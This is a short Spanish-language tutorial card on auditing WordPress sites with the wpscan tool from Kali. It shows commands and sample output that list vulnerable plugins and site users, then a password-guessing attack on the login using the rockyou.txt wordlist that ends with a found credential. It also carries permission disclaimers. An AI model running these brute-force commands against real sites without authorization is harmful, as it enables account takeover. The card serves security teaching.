KALI
Hackea (audita) WordPress
WordPress corre en casi la mitad de la web, y sus plugins son un coladero.
wpscan enumera la versión del core, los temas y sobre todo los plugins vulnerables. Con enumerate u lista los usuarios reales del sitio.
Y con esos usuarios puedes lanzar un ataque de contraseñas al login. La mayoría de los WordPress hackeados caen por un plugin viejo.
Solo en sitios propios o con permiso.
# los comandos
kali@kali:~$ wpscan --url http://10.0.0.5 --enumerate vp,ucopiar[+] WordPress 6.2 (desactualizado)
[!] Plugin: contact-form-7 5.3 - CVE-2023-...
[+] Users: admin, editor
kali@kali:~$ wpscan --url http://10.0.0.5 -U admin -P rockyou.txtcopiar[+] Valid Combinations Found: admin / verano2026
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.